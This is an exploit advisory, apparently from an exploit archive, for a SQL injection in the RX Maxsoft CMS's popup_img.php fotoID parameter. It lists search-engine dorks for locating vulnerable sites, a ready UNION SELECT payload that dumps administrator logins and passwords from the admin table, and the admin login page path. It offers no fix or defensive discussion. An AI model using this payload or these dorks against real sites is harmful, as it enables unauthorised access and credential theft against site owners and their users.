RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability

2008-04-10
ID: 2865
CVE: None
Download vulnerable application: None
##########################################
#
# Provozovano na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozovano na RS MAXSOFT"
#
###########################################
you will see adminname and password on title

EXPLOiT:

modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin


ADMiN LOGiN=admin.php?page=logfrm


###########################################


1-4-2 (www02)